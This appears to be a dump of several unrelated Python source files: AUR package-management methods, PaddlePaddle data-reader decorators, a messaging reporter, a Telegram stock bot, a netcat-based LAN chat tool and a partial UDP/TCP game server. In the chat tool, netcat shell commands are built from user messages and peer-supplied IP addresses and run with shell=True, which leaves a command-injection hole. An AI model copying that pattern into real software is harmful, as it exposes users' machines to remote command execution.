ignored.add(line_clean)
return ignored
def _write_ignored(self, names: Set[str]):
Path(CONFIG_DIR).mkdir(parents=True, exist_ok=True)
ignored_list = [*names]
ignored_list.sort()
with open(UPDATES_IGNORED_FILE, 'w+') as f:
if ignored_list:
for pkg in ignored_list:
f.write('{}\n'.format(pkg))
else:
f.write('')
def ignore_update(self, pkg: ArchPackage):
ignored = self._list_ignored_updates()
if pkg.name not in ignored:
ignored.add(pkg.name)
self._write_ignored(ignored)
pkg.update_ignored = True
def _revert_ignored_updates(self, pkgs: Iterable[str]):
ignored = self._list_ignored_updates()
for p in pkgs:
if p in ignored:
ignored.remove(p)
self._write_ignored(ignored)
def revert_ignored_update(self, pkg: ArchPackage):
self._revert_ignored_updates({pkg.name})
pkg.update_ignored = False
def _add_as_editable_pkgbuild(self, pkgname: str):
try:
Path('/'.join(EDITABLE_PKGBUILDS_FILE.split('/')[0:-1])).mkdir(parents=True, exist_ok=True)
editable = self._read_editable_pkgbuilds()
if pkgname not in editable:
editable.add(pkgname)
self._write_editable_pkgbuilds(editable)
return True
except:
traceback.print_exc()
return False
def _write_editable_pkgbuilds(self, editable: Set[str]):
if editable:
with open(EDITABLE_PKGBUILDS_FILE, 'w+') as f:
for name in sorted([*editable]):
f.write('{}\n'.format(name))
else:
os.remove(EDITABLE_PKGBUILDS_FILE)
def _remove_from_editable_pkgbuilds(self, pkgname: str):
if os.path.exists(EDITABLE_PKGBUILDS_FILE):
try:
editable = self._read_editable_pkgbuilds()
if pkgname in editable:
editable.remove(pkgname)
self._write_editable_pkgbuilds(editable)
except:
traceback.print_exc()
return False
return True
def _read_editable_pkgbuilds(self) -> Set[str]:
if os.path.exists(EDITABLE_PKGBUILDS_FILE):
with open(EDITABLE_PKGBUILDS_FILE) as f:
return {l.strip() for l in f.readlines() if l and l.strip()}
return set()
def enable_pkgbuild_edition(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher):
if self._add_as_editable_pkgbuild(pkg.name):
pkg.pkgbuild_editable = True
def disable_pkgbuild_edition(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher):
if self._remove_from_editable_pkgbuilds(pkg.name):
pkg.pkgbuild_editable = False
def setup_snapd(self, root_password: str, watcher: ProcessWatcher) -> bool:
# checking services
missing_items = []
for serv, active in system.check_enabled_services('snapd.service', 'snapd.socket').items():
if not active:
missing_items.append(InputOption(label=self.i18n['snap.custom_action.setup_snapd.service_disabled'].format("'{}'".format(serv)),
value='enable:{}'.format(serv),
read_only=True))
for serv, active in system.check_active_services('snapd.service', 'snapd.socket').items():
if not active:
missing_items.append(InputOption(label=self.i18n['snap.custom_action.setup_snapd.service_inactive'].format("'{}'".format(serv)),
value='start:{}'.format(serv),
read_only=True))
link = '/snap'
link_dest = '/var/lib/snapd/snap'
if not os.path.exists('/snap'):
missing_items.append(InputOption(label=self.i18n['snap.custom_action.setup_snapd.missing_link'].format("'{}'".format(link), "'{}'".format(link_dest)),
value='link:{}:{}'.format(link, link_dest),
read_only=True))
if missing_items:
actions = MultipleSelectComponent(label=self.i18n['snap.custom_action.setup_snapd.required_actions'],
options=missing_items,
default_options=set(missing_items),
max_per_line=1,
spaces=False)
if watcher.request_confirmation(title=self.i18n['confirmation'].capitalize(),
body='',
components=[actions],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
valid_pwd, pwd = watcher.request_root_password()
if valid_pwd:
handler = ProcessHandler(watcher)
for a in missing_items:
action = a.value.split(':')
if action[0] == 'enable':
msg = 'Enabling service {}'.format(action[1])
watcher.print(msg)
self.logger.info(msg)
proc = SimpleProcess(['systemctl', 'enable', '--now', action[1]], root_password=pwd)
elif action[0] == 'start':
msg = 'Starting service {}'.format(action[1])
watcher.print(msg)
self.logger.info(msg)
proc = SimpleProcess(['systemctl', 'start', action[1]], root_password=pwd)
elif action[0] == 'link':
msg = 'Creating symbolic link {} for {}'.format(action[1], action[2])
watcher.print(msg)
self.logger.info(msg)
proc = SimpleProcess(['ln', '-s', action[2], action[1]], root_password=pwd)
else:
msg = "Wrong action '{}'".format(action)
watcher.print(msg)
self.logger.warning(msg)
proc = None
if not proc:
return False
success, output = handler.handle_simple(proc)
if not success:
watcher.show_message(title=self.i18n['error'].capitalize(),
body=output,
type_=MessageType.ERROR)
return False
watcher.show_message(title=self.i18n['snap.custom_action.setup_snapd.ready'],
body=self.i18n['snap.custom_action.setup_snapd.ready.body'],
type_=MessageType.INFO)
return True
else:
watcher.show_message(title=self.i18n['snap.custom_action.setup_snapd.ready'],
body=self.i18n['snap.custom_action.setup_snapd.ready.body'],
type_=MessageType.INFO)
return True
def _gen_custom_pkgbuild_if_required(self, context: TransactionContext) -> Optional[str]:
build_only_chosen = context.config.get('aur_build_only_chosen')
pkgs_to_build = aur.map_srcinfo(string=self._read_srcinfo(context), pkgname=None, fields={'pkgname'}).get('pkgname')
if isinstance(pkgs_to_build, str):
pkgs_to_build = {pkgs_to_build}
else:
pkgs_to_build = {*pkgs_to_build}
if build_only_chosen is False:
context.pkgs_to_build = pkgs_to_build
return
# checking if more than one package is mapped for this pkgbuild
if not pkgs_to_build or not isinstance(pkgs_to_build, set) or len(pkgs_to_build) == 1 or context.name not in pkgs_to_build:
context.pkgs_to_build = pkgs_to_build
return
if build_only_chosen is None:
if not context.dependency:
pkgnames = [InputOption(label=n, value=n, read_only=False) for n in pkgs_to_build if n != context.name]
select = MultipleSelectComponent(label='',
options=pkgnames,
default_options={*pkgnames},
max_per_line=1)
if not context.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.aur.sync.several_names.popup.body'].format(bold(context.name)) + ':',
components=[select],
confirmation_label=self.i18n['arch.aur.sync.several_names.popup.bt_only_chosen'].format(context.name),
deny_label=self.i18n['arch.aur.sync.several_names.popup.bt_selected']):
context.pkgs_to_build = {context.name, *select.get_selected_values()}
pkgbuild_path = '{}/PKGBUILD'.format(context.project_dir)
with open(pkgbuild_path) as f:
current_pkgbuild = f.read()
if context.pkgs_to_build:
names = '({})'.format(' '.join(("'{}'".format(p) for p in context.pkgs_to_build)))
else:
names = context.name
context.pkgs_to_build = {context.name}
new_pkgbuild = RE_PKGBUILD_PKGNAME.sub("pkgname={}".format(names), current_pkgbuild)
custom_pkgbuild_path = pkgbuild_path + '_CUSTOM'
with open(custom_pkgbuild_path, 'w+') as f:
f.write(new_pkgbuild)
new_srcinfo = makepkg.gen_srcinfo(context.project_dir, custom_pkgbuild_path)
with open('{}/.SRCINFO'.format(context.project_dir), 'w+') as f:
f.write(new_srcinfo)
return custom_pkgbuild_path
def _list_opt_deps_with_no_hard_requirements(self, source_pkgs: Set[str], installed_provided: Optional[Dict[str, Set[str]]] = None) -> Set[str]:
optdeps = set()
for deps in pacman.map_optional_deps(names=source_pkgs, remote=False).values():
optdeps.update(deps.keys())
res = set()
if optdeps:
all_provided = pacman.map_provided() if not installed_provided else installed_provided
real_optdeps = set()
for o in optdeps:
dep_providers = all_provided.get(o)
if dep_providers:
for p in dep_providers:
if p not in source_pkgs:
real_optdeps.add(p)
if real_optdeps:
for p in real_optdeps:
try:
reqs = pacman.list_hard_requirements(p, self.logger)
if reqs is not None and (not reqs or reqs.issubset(source_pkgs)):
res.add(p)
except PackageInHoldException:
self.logger.warning("There is a requirement in hold for opt dep '{}'".format(p))
continue
return res
def reinstall(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool: # only available for AUR packages
if not self.context.internet_checker.is_available():
raise NoInternetException()
self.aur_client.clean_caches()
apidatas = self.aur_client.get_info({pkg.name})
if not apidatas:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.action.reinstall.error.no_apidata'],
type_=MessageType.ERROR)
return False
self.aur_mapper.fill_last_modified(pkg, apidatas[0])
context = TransactionContext.gen_context_from(pkg=pkg,
arch_config=self.configman.get_config(),
root_password=root_password,
handler=ProcessHandler(watcher),
aur_supported=True)
context.skip_opt_deps = False
context.update_aur_index = True
return self.install(pkg=pkg,
root_password=root_password,
watcher=watcher,
context=context,
disk_loader=self.context.disk_loader_factory.new()).success
def set_rebuild_check(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
if pkg.repository != 'aur':
return False
try:
if pkg.allow_rebuild:
rebuild_detector.add_as_ignored(pkg.name)
pkg.allow_rebuild = False
else:
rebuild_detector.remove_from_ignored(pkg.name)
pkg.allow_rebuild = True
except:
self.logger.error("An unexpected exception happened")
traceback.print_exc()
return False
pkg.update_state()
return True
|
decorator.py | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'cache', 'map_readers', 'buffered', 'compose', 'chain', 'shuffle',
'ComposeNotAligned', 'firstn', 'xmap_readers', 'multiprocess_reader'
]
from threading import Thread
import subprocess
import multiprocessing
import six
import sys
from six.moves.queue import Queue
from six.moves import zip_longest
from six.moves import map
from six.moves import zip
import itertools
import random
import zlib
import paddle.compat as cpt
def cache(reader):
"""
Cache the reader data into memory.
Be careful that this method may take long time to process,
and consume lots of memory. :code:`reader()` would only
call once.
Args:
reader (generator): a reader object which yields
data each time.
Returns:
generator: a decorated reader object which yields data from cached memory.
"""
all_data = tuple(reader())
def __impl__():
for item in all_data:
yield item
return __impl__
def map_readers(func, *readers):
"""
Creates a data reader that outputs return value of function using
output of each data reader as arguments.
If input readers output the following data entries: 2 3,
and the input func is mul(x, y),
the output of the resulted reader will be 6.
Args:
func: a function to read data and compute result, the output of this function
will be set as the output of the resulted data reader.
readers (Reader|list of Reader): list of readers whose outputs will be used as arguments of func.
Returns:
the resulted data reader (Reader)
Examples:
.. code-block:: python
import paddle.reader
d = {"h": 0, "i": 1}
def func(x):
return d[x]
def reader():
yield "h"
yield "i"
map_reader_result = paddle.reader.map_readers(func, reader)
"""
def reader():
rs = []
for r in readers:
rs.append(r())
for e in map(func, *rs):
yield e
return reader
def shuffle(reader, buf_size):
"""
paddle.fluid.io.shuffle ( :ref:`api_fluid_io_shuffle` ) is recommended to use,
and paddle.reader.shuffle is an alias.
This API creates a decorated reader that outputs the shuffled data.
The output data from the origin reader will be saved into a buffer,
and then shuffle the data. The size of buffer is determined by argument buf_size.
Args:
reader(callable): the original reader whose data will be shuffled.
buf_size(int): the size of shuffled buffer.
Returns:
callable: a decorated reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
def reader():
for i in range(5):
yield i
shuffled_reader = fluid.io.shuffle(reader, 3)
for e in shuffled_reader():
print(e)
# outputs are 0~4 unordered arrangement
"""
def data_reader():
buf = []
for e in reader():
buf.append(e)
if len(buf) >= buf_size:
random.shuffle(buf)
for b in buf:
yield b
buf = []
if len(buf) > 0:
random.shuffle(buf)
for b in buf:
yield b
return data_reader
def chain(*readers):
"""
Use the input data readers to create a chained data reader. The new created reader
chains the outputs of input readers together as its output.
**Note**:
``paddle.reader.chain`` is the alias of ``paddle.fluid.io.chain``, and
``paddle.fluid.io.chain`` is recommended to use.
For example, if three input readers' outputs are as follows:
[0, 0, 0],
[10, 10, 10],
[20, 20, 20].
The chained reader will output:
[[0, 0, 0], [10, 10, 10], [20, 20, 20]].
Args:
readers(list): input data readers.
Returns:
callable: the new chained data reader.
Examples:
.. code-block:: python
import paddle
def reader_creator_3(start):
def reader():
for i in range(start, start + 3):
yield [i, i, i]
return reader
c = paddle.reader.chain(reader_creator_3(0), reader_creator_3(10), reader_creator_3(20))
for e in c():
print(e)
# Output:
# [0, 0, 0]
# [1, 1, 1]
# [2, 2, 2]
# [10, 10, 10]
# [11, 11, 11]
# [12, 12, 12]
# [20, 20, 20]
# [21, 21, 21]
# [22, 22, 22]
"""
def reader():
rs = []
for r in readers:
rs.append(r())
for e in itertools.chain(*rs):
yield e
return reader
class ComposeNotAligned(ValueError):
pass
def compose(*readers, **kwargs):
"""
Creates a data reader whose output is the combination of input readers.
If input readers output following data entries:
(1, 2) 3 (4, 5)
The composed reader will output:
(1, 2, 3, 4, 5)
Args:
readers (Reader|list of Reader): readers that will be composed together.
check_alignment(bool, optional): Indicates whether the input readers are checked for
alignment. If True, whether input readers are aligned
correctly will be checked, else alignment will not be checkout and trailing outputs
will be discarded. Defaults to True.
Returns:
the new data reader (Reader).
Raises:
ComposeNotAligned: outputs of readers are not aligned. This will not raise if check_alignment is set to False.
Examples:
.. code-block:: python
import paddle.fluid as fluid
def reader_creator_10(dur):
def reader():
for i in range(10):
yield i
return reader
reader = fluid.io.compose(reader_creator_10(0), reader_creator_10(0))
"""
check_alignment = kwargs.pop('check_alignment', True)
def make_tuple(x):
if isinstance(x, tuple):
return x
else:
return (x, )
def reader():
rs = []
for r in readers:
rs.append(r())
if not check_alignment:
for outputs in zip(*rs):
yield sum(list(map(make_tuple, outputs)), ())
else:
for outputs in zip_longest(*rs):
for o in outputs:
if o is None:
# None will be not be present if compose is aligned
raise ComposeNotAligned(
"outputs of readers are not aligned.")
yield sum(list(map(make_tuple, outputs)), ())
return reader
def buffered(reader, size):
"""
Creates a buffered data reader.
The buffered data reader will read and save data entries into a
buffer. Reading from the buffered data reader will proceed as long
as the buffer is not empty.
:param reader: the data reader to read from.
:type reader: callable
:param size: max buffer size.
:type size: int
:returns: the buffered data reader.
"""
class EndSignal():
pass
end = EndSignal()
def read_worker(r, q):
for d in r:
q.put(d)
q.put(end)
def data_reader():
r = reader()
q = Queue(maxsize=size)
t = Thread(
target=read_worker, args=(
r,
q, ))
t.daemon = True
t.start()
e = q.get()
while e != end:
yield e
e = q.get()
return data_reader
def firstn(reader, n):
"""
paddle.fluid.io.firstn ( :ref:`api_fluid_io_firstn` ) is recommended to use,
and paddle.reader.firstn is an alias.
This API creates a decorated reader, and limits the max number of
samples that reader could return.
Args:
reader(callable): the input reader.
n(int): the max number of samples in the reader.
Returns:
callable: the decorated reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
def reader():
for i in range(100):
yield i
firstn_reader = fluid.io.firstn(reader, 5)
for e in firstn_reader():
print(e)
# the outputs are: 0 1 2 3 4
"""
# TODO(yuyang18): Check if just drop the reader, could clean the opened
# resource or not?
def firstn_reader():
for i, item in enumerate(reader()):
if i == n:
break
yield item
return firstn_reader
class XmapEndSignal():
pass
def xmap_readers(mapper, reader, process_num, buffer_size, order=False):
"""
Use multi-threads to map samples from reader by a mapper defined by user.
Args:
mapper (callable): a function to map the data from reader.
reader (callable): a data reader which yields the data.
process_num (int): thread number to handle original sample.
buffer_size (int): size of the queue to read data in.
order (bool): whether to keep the data order from original reader.
Default False.
Returns:
callable: a decorated reader with data mapping.
"""
end = XmapEndSignal()
# define a worker to read samples from reader to in_queue
def read_worker(reader, in_queue):
for i in reader():
in_queue.put(i)
in_queue.put(end)
# define a worker to read samples from reader to in_queue with order flag
def order_read_worker(reader, in_queue):
in_order = 0
for i in reader():
in_queue.put((in_order, i))
in_order += 1
in_queue.put(end)
# define a worker to handle samples from in_queue by mapper
# and put mapped samples into out_queue
def handle_worker(in_queue, out_queue, mapper):
sample = in_queue.get()
while not isinstance(sample, XmapEndSignal):
r = mapper(sample)
out_queue.put(r)
sample = in_queue.get()
in_queue.put(end)
out_queue.put(end)
# define a worker to handle samples from in_queue by mapper
# and put mapped samples into out_queue by order
def order_handle_worker(in_queue, out_queue, mapper, out_order):
ins = in_queue.get()
while not isinstance(ins, XmapEndSignal):
order, sample = ins
r = mapper(sample)
while order != out_order[0]:
pass
out_queue.put(r)
out_order[0] += 1
ins = in_queue.get()
in_queue.put(end)
out_queue.put(end)
def xreader():
in_queue = Queue(buffer_size)
out_queue = Queue(buffer_size)
out_order = [0]
# start a read worker in a thread
target = order_read_worker if order else read_worker
t = Thread(target=target, args=(reader, in_queue))
t.daemon = True
t.start()
# start several handle_workers
target = order_handle_worker if order else handle_worker
args = (in_queue, out_queue, mapper, out_order) if order else (
in_queue, out_queue, mapper)
workers = []
for i in range(process_num):
worker = Thread(target=target, args=args)
worker.daemon = True
workers.append(worker)
for w in workers:
w.start()
sample = out_queue.get()
while not isinstance(sample, XmapEndSignal):
yield sample
sample = out_queue.get()
finish = 1
while finish < process_num:
sample = out_queue.get()
if isinstance(sample, XmapEndSignal):
finish += 1
else:
yield sample
return xreader
def multiprocess_reader(readers, use_pipe=True, queue_size=1000):
"""
This API use python ``multiprocessing`` to read data from ``readers`` parallelly,
and then ``multiprocess.Queue`` or ``multiprocess.Pipe`` is used to merge
these data. A seperate process will be created for each reader in the
``readers`` list, please guarantee every reader can work independently
to avoid conflicts in parallel environment.
``Multiprocess.Queue`` require the rw access right to /dev/shm, and it's not suppported
in some platforms.
Parameters:
readers (list( ``generator`` ) | tuple( ``generator`` )): a python ``generator`` list
used to read input data
use_pipe (bool, optional): control the inner API used to implement the multi-processing,
default True - use ``multiprocess.Pipe`` which is recommended
queue_size (int, optional): only useful when ``use_pipe`` is False - ``multiprocess.Queue``
is used, default 1000. Increase this value can speed up the data reading, and more memory
will be consumed.
Returns:
``generator``: a new reader which can be run parallelly
Example:
.. code-block:: python
import paddle.fluid as fluid
from paddle.fluid.io import multiprocess_reader
import numpy as np
sample_files = ['sample_file_1', 'sample_file_2']
def fake_input_files():
with open(sample_files[0], 'w') as f:
np.savez(f, a=np.array([1, 2]), b=np.array([3, 4]), c=np.array([5, 6]), d=np.array([7, 8]))
with open(sample_files[1], 'w') as f:
np.savez(f, a=np.array([9, 10]), b=np.array([11, 12]), c=np.array([13, 14]))
def generate_reader(file_name):
# load data file
def _impl():
data = np.load(file_name)
for item in sorted(data.files):
yield data[item],
return _impl
if __name__ == '__main__':
# generate sample input files
fake_input_files()
with fluid.program_guard(fluid.Program(), fluid.Program()):
place = fluid.CPUPlace()
# the 1st 2 is batch size
image = fluid.data(name='image', dtype='int64', shape=[2, 1, 2])
fluid.layers.Print(image)
# print detailed tensor info of image variable
reader = fluid.io.PyReader(feed_list=[image], capacity=2)
decorated_reader = multiprocess_reader(
[generate_reader(sample_files[0]), generate_reader(sample_files[1])], False)
reader.decorate_sample_generator(decorated_reader, batch_size=2, places=[place])
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for data in reader():
res = exe.run(feed=data, fetch_list=[image])
print(res[0])
# print below content in this case
# [[[1 2]], [[3 4]]]
# [[[5 6]], [[7 8]]]
# [[[9 10]], [[11 12]]]
# [13,14] will be dropped
"""
try:
import ujson as json
except Exception as e:
sys.stderr.write("import ujson error: " + str(e) + " use json\n")
import json
assert type(readers) is list and len(readers) > 0
def _read_into_queue(reader, queue):
try:
for sample in reader():
if sample is None:
raise ValueError("sample has None")
queue.put(sample)
queue.put(None)
except:
queue.put("")
six.reraise(*sys.exc_info())
def queue_reader():
queue = multiprocessing.Queue(queue_size)
for reader in readers:
p = multiprocessing.Process(
target=_read_into_queue, args=(reader, queue))
p.start()
reader_num = len(readers)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
elif sample == "":
raise ValueError("multiprocess reader raises an exception")
else:
yield sample
def _read_into_pipe(reader, conn):
try:
for sample in reader():
if sample is None:
raise ValueError("sample has None!")
conn.send(json.dumps(sample))
conn.send(json.dumps(None))
conn.close()
except:
conn.send(json.dumps(""))
conn.close()
six.reraise(*sys.exc_info())
def pipe_reader():
conns = []
for reader in readers:
parent_conn, child_conn = multiprocessing.Pipe()
conns.append(parent_conn)
p = multiprocessing.Process(
target=_read_into_pipe, args=(reader, child_conn))
p.start()
reader_num = len(readers)
finish_num = 0
conn_to_remove = []
while finish_num < reader_num:
for conn in conn_to_remove:
conns.remove(conn)
conn_to_remove = []
for conn in conns:
sample = json.loads(conn.recv())
if sample is None:
finish_num += 1
conn.close()
conn_to_remove.append(conn)
elif sample == "":
conn.close()
conn_to_remove.append(conn)
raise ValueError("multiprocess reader raises an exception")
else:
yield sample
if use_pipe:
return pipe_reader
else:
return queue_reader
|
reporter.py | import logging
import signal
import threading
from context import get_context
from message_constants import MessageTypes, Topics
import parse_params as pp
from plugins import get_plugin, PluginType
from pubsub_client import make_sub_client
from remote_logging import configure_logging
from serialization import read_report_message, read_control_message
from zmq_extras import sub_polling_loop_handlers
logger = logging.getLogger("Reporter")
HELP_STRING = "Reporter process"
def start_reporter_thread():
t = threading.Thread(target=reporter,)
t.start()
return t
def load_plugins(context):
report_writer = get_plugin(
PluginType.report_store, key=context.get("report_storage_provider"),
)
if not report_writer:
logger.error(
"Report storage provider plugin %s not found. Quitting",
context.get("report_storage_provider"),
)
return False, None
return True, report_writer
def reporter():
logger.info("Starting reporter")
context = get_context()
ignore_kill = context.get("ignore_kill", False)
success, report_writer = load_plugins(context)
if not success:
return
writer = report_writer()
def on_message(_, message):
m_data, msg = read_report_message(message)
logger.info("Reporter message received")
logger.debug("m_data %s", m_data)
writer({**context, **m_data}, msg)
return False
def on_control_message(_, msg):
message = read_control_message(msg)
if message in (
MessageTypes.kill,
MessageTypes.all_kill,
MessageTypes.reporter_kill,
MessageTypes.global_kill,
):
logger.info("Reporter received quit message")
if not ignore_kill:
return True
logger.info("Ignoring kill message")
return False
logger.debug("Unknown control message received %s", message)
return False
try:
sub_client = make_sub_client(["lreport"])
handlers = {
Topics.control: on_control_message,
Topics.learning_reports: on_message,
}
sub_polling_loop_handlers(sub_client, handlers)
finally:
sub_client.close()
logging.info("Reporting finished")
def build_args():
parser = pp.create_parser(HELP_STRING)
pp.add_remote_log(parser)
pp.add_report_storage_provider(parser)
pp.add_report_dir(parser)
pp.add_sub_address(parser)
pp.add_ignorekill(parser)
args = pp.get_args(parser)
pp.bind_args_to_context(args)
return args
def main():
signal.signal(signal.SIGINT, signal.SIG_DFL)
args = build_args()
configure_logging(args.remote_log)
reporter()
if __name__ == "__main__":
main()
|
main.py | import sys
import telegram
import time
from multiprocessing import Process, Value, Array
from PyQt5.QtWidgets import *
from KK1StockSupportBot import KK1StockSupportBot
from KK1StockAPI import KK1StockAPI
def callback_help_command(update: telegram.Update, context):
reply_text = str()
reply_text += "☆ 현재 명령어는 다음과 같이 구현되어 있습니다.\n"
reply_text += "└ /help: 명령어 리스트를 출력한다.\n"
# event_handler = 'help'
update.message.reply_text(reply_text)
def run_stock_api(token: str, event_handler: Value):
app = QApplication(sys.argv)
stock_api = KK1StockAPI(token)
stock_api.show()
# app.exec_() # QT UI 이벤트를 사용할 것은 아니기 때문에 필요없음.
count = 1
while True:
time.sleep(0.5)
# stock_api.sendMessage("Test message " + str(count))
# count += 1
# if event_handler:
# print(event_handler)
# event_handler = None
def run_telegram_bot(token: str, event_handler: Value):
telegram_bot = KK1StockSupportBot(token)
telegram_bot.add_command_handler('help', callback_help_command)
telegram_bot.run()
def run_kk1_stock_supporter():
with open("D:/Projects/KK1StockSupporter/KK1StockSupport_bot.token") as file:
my_token = file.readline()
# 공유 자원을 이벤트 핸들러로 활용한다.
# updater 에서는 들어오는 명령어를 받아 event_handler 를 통해 주식 api 에게 전달
# 주식 api 는 받은 명령을 수행하고 수행 결과를 send
# 주식 api 는 지속적으로 시장을 체크해서 특정 조건에 message send
event_handler = Value('i', 0)
stock_api_process = Process(target=run_stock_api, args=(my_token, event_handler))
telegram_updater_process = Process(target=run_telegram_bot, args=(my_token, event_handler))
stock_api_process.start()
telegram_updater_process.start()
stock_api_process.join()
telegram_updater_process.join()
if __name__ == '__main__':
run_kk1_stock_supporter()
|
app.py | import threading
import os
import subprocess
import json
import sys
import re
import time
import netifaces
port = 12345
def my_server(local_ip,response_json):
while(True):
try:
cmd = 'nc -l -p {}'.format(port)
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
encoding='utf-8',
errors='replace'
)
out = process.stdout.readline()
start=out.find('{')
end=out.find('}')+1
msg=out[start:end]
rejson = json.loads(msg)
print("the json loaded is :",rejson,flush=True)
if rejson["TYPE"] == "DISCOVER":
response_msg = {
"MY_IP":"",
"NAME":"",
"TYPE":"RESPOND",
"PAYLOAD":""
}
is_writable = True
responses = response_json["response_array"]
for response in responses:
if response["ip"] == rejson["MY_IP"]:
is_writable = False
if is_writable:
response_json["response_array"].append({"user_name":rejson["NAME"],"ip":rejson["MY_IP"]})
with open("response_json.json", "w") as outfile:
outfile.write(json.dumps(response_json))
response_msg["MY_IP"]=local_ip
response_msg["NAME"] = "ismet"
client(json.dumps(response_msg),rejson["MY_IP"])
log_file = open("log.txt","a")
log_file.write("you got a DISCOVER message from "+rejson["MY_IP"]+" so send a RESPOND message \n")
log_file.close()
elif rejson["TYPE"] == "RESPOND":
is_writable = True
responses = response_json["response_array"]
for response in responses:
if response["ip"] == rejson["MY_IP"]:
is_writable = False
if is_writable:
response_json["response_array"].append({"user_name":rejson["NAME"],"ip":rejson["MY_IP"]})
with open("response_json.json", "w") as outfile:
outfile.write(json.dumps(response_json))
log_file = open("log.txt","a")
log_file.write("you got a RESPOND message from "+rejson["MY_IP"]+"\n")
log_file.close()
else:
log_file = open("log.txt","a")
log_file.write("you got a MESSAGE message from "+rejson["MY_IP"]+" which is "+rejson["PAYLOAD"]+"\n")
log_file.close()
os.system("clear")
print("msg is ",msg,flush=True)
print("Whay do yo want to do \n Press m to send message\n Press d to send spesific discovery to an ip address\n",flush=True)
sys.stdout.flush()
except Exception as e:
print("There is an error \n",e,flush=True)
def client(message,to):
try:
command = "echo '{}' | nc {} {} -c".format(message,to,port)
print("sending the message with the command ",command,flush=True)
subprocess.call(command, shell=True)
except:
pass
def get_local_ips(is_hamachi):
local_ip = ""
if is_hamachi:
for i in netifaces.interfaces():
for l in netifaces.ifaddresses(i).get(netifaces.AF_INET, ()):
if l['addr'].startswith('25.'):
local_ip = l['addr']
else:
local_ip = subprocess.getoutput("ipconfig getifaddr en0")
parse=local_ip.split(".")
lan=str(parse[0])+"."+str(parse[1])+"."+str(parse[2])
return (local_ip,lan)
def send_discovery(local_ip,lan):
data={"MY_IP":"",
"NAME":"ismet",
"TYPE":"DISCOVER",
"PAYLOAD":""}
data["MY_IP"]=local_ip
for last_number in range(0,256):
temp_ip = lan+"."+str(last_number)
if temp_ip != local_ip:
log_file = open("log.txt","a")
log_file.write("you send a DISCOVER message to "+temp_ip+"\n")
log_file.close()
msg = json.dumps(data)
try:
cmd = "echo '{}' | nc {} {}".format(msg,temp_ip,port)
subprocess.Popen(cmd, shell=True)
except:
pass
sys.stdout.flush()
def input_process(my_ip):
os.system("clear")
while(True):
request = input("Whay do yo want to do \n Press m to send message\n Press d to send spesific discovery to an ip address\n")
if request == "m":
print('Write you messsage\n',flush=True)
your_message=input()
os.system("clear")
json_data={"MY_IP":"",
"NAME":"ismet",
"TYPE":"MESSAGE",
"PAYLOAD":""}
json_data["MY_IP"] = my_ip
json_data["PAYLOAD"] = your_message
msg=json.dumps(json_data)
print('Which user do you want to send this message\n',flush=True)
responses = response_json["response_array"]
index = 1
for response in responses:
print(index,".",response["user_name"],"\n",flush=True)
index = index + 1
user_order=int(input("give order\n"))
ip_to_send = response_json["response_array"][user_order-1]["ip"]
client(msg,ip_to_send)
log_file = open("log.txt","a")
log_file.write("you send a MESSAGE message to "+ip_to_send+"\n")
log_file.close()
elif request == "d":
print('Write the ip address',flush=True)
ip_to_send=input()
os.system("clear")
json_data={"MY_IP":"",
"NAME":"ismet",
"TYPE":"DISCOVER",
"PAYLOAD":""}
json_data["MY_IP"] = my_ip
msg=json.dumps(json_data)
client(msg,ip_to_send)
log_file = open("log.txt","a")
log_file.write("you send a DISCOVER message to "+ip_to_send+"\n")
log_file.close()
else:
input_process(my_ip)
if __name__ == "__main__":
response_json={}
with open("response_json.json", "r") as outfile:
response_json = json.load(outfile)
hamachi = False
try:
if sys.argv[1] == "h":
hamachi = True
except:
pass
t=get_local_ips(hamachi)
server = threading.Thread(target=my_server,args=(t[0],response_json,))
server.start()
time.sleep(2)
discovery_thread = threading.Thread(target=send_discovery,args=(t[0],t[1],))
discovery_thread.start()
discovery_thread.join()
input_process(my_ip=t[0])
|
Server.py | import socket
import time
import struct
from random import randint
from threading import Thread
import os
from scapy.arch import get_if_addr
os.system("")
# Colors for prints
class Colors:
GREEN = '\033[32m'
BLUE = '\033[34m'
PINK = '\033[35m'
UDP_DEST_IP = '<broadcast>'
UDP_DEST_PORT = 13117
TCP_DEST_PORT = 2006
MESSAGE_LENGTH = 1024
TIME_UNTIL_GAME = 10 # seconds
TIME_TO_PLAY = 10 # seconds
sockUDP = None
sockTCP = None
CONN_A = None
CONN_B = None
counter = 0
def start_udp():
global sockUDP
ip = get_if_addr("eth1")
sockUDP = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) # UDP
sockUDP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sockUDP.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
return ip
def send_broadcast():
global sockUDP
ip = start_udp()
print(Colors.GREEN + "Server started, listening on IP address " + ip)
while counter < 2:
buffer = struct.pack('IBH', 0xabcddcba, 0x2, TCP_DEST_PORT)
sockUDP.sendto(buffer, (UDP_DEST_IP, UDP_DEST_PORT))
time.sleep(1) # dont overload
def connect_clients():
global counter, sockTCP, CONN_B, CONN_A # can use address later
while True:
if counter < 2:
try:
conn, address = sockTCP.accept()
if counter == 0:
CONN_A = conn
CONN_A.setblocking(0)
else:
CONN_B = conn
CONN_B.setblocking(0)
counter += 1
except Exception as e:
pass
else:
print(Colors.BLUE + "game starts in 10 secs")
break
def get_group_names():
try:
